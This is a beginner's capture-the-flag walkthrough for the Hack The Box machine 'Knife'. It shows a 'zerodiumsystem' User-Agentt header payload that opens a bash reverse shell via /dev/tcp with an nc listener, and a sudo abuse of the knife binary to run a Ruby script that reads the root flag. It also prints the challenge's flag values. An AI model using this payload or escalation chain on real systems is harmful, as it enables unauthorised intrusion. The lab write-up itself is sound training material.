Knife — Hack The Box
Hey guys today i’m going to solve Knife a vulnerable machine of Hack The Box. This machine is a beginner friendly box and i recommend you guys to pwne it. The box is relatively easy for anyone who is a beginner in penetration testing or cybersecurity. Without wasting your time (mine too) lets go…
Our first task is to do Nmap scan on the target ip : —
And we get 2 open ports. Since http has a bigger attack surface i’ll start by enumerating it…
Opening the webpage using mozilla we get a standard webpage…
Before doing any further enumeration i always take a look at the sourcecode of the webpage, sometimes developers leaves comments behind that might be helpful in exploiting the box (Just press ctr+u) it will open a window with the sourcecode in another tab…
But we didn’t find any comment left by the developer…
After wasting few minutes in directory bruteforcing on the website using gobuster & scanning it with nikto i didn’t found anything useful…
But suddenly i thought to intercept the web request using Burp suite and i found that the website is vulnerable to Remote Code Execution (RCE)…
And we can see that the website is really vulnerable to RCE…
So lets spawn a reverse shell without wasting time :-
User-Agentt: zerodiumsystem("/bin/bash -c 'bash -i >& /dev/tcp/ip/port 0>&1'");
Listen your shell using the command :-
nc -lvnp 1234
After few seconds you’ll get a shell….
Lets hunt user.txt it is in the directory of user james i.e /home/james …
user.txt : f2485ba651c56e09f2f80c9f72909e55
Its time to hunt root.txt or root flag…
So lets check how many sudo commands can the user james run :-
So poor, james can only run the command /usr/bin/knife as super user without password…
After few minutes of hunting i found that it can execute ruby scripts…
You can see that there’s a command “knife exec [SCRIPT] (options)” which can execute scripts…
Our next step is to create a ruby script and execute it via knife from the command mentioned above…
For this i took help of my friends …
They suggest me a script which i can execute in order to directly get the root.txt or root flag…
Create a file using nano or any editors of your choice and write the followings …
f = File.open(“/root/root.txt”, “r”)
f.each_line do |line|
puts line
end
f.close
Save it with ‘.rb’ extension and send it to your victim machine in my case i had saved it as root.rb…
You can follow the steps mentioned below to send the file…
In order to send the file / script i used ‘python SimpleHTTPServer’ …
python -m SimpleHTTPServer 80
And to receive the file / script on my vicitim machine i used ‘wget’…
wget ‘your_ip:port/file’
Now its time to execute the script so lets go…..
Command to execute the script :-
/usr/bin/knife exec root.rb
Horray!! we got the flag.txt or root flag you can see it is in the last second line…
root.txt : 73c3dc81e8991d7612c3fe8b8fe5f159
Warning!!!! As i think root flag is changed after some times so if you will directly enter the root flag then there is a higher chance of getting error. So you can simply follow the instruction mentioned above and get your flags…
Thanks!!
Note : There’s a difference in date & time coz I already told you that i did’t get enough time but to help you guys in pwning the machine, somehow i managed the time.
Again thanks for reading.
For any queries, dm me on Instagram @ig._.anshu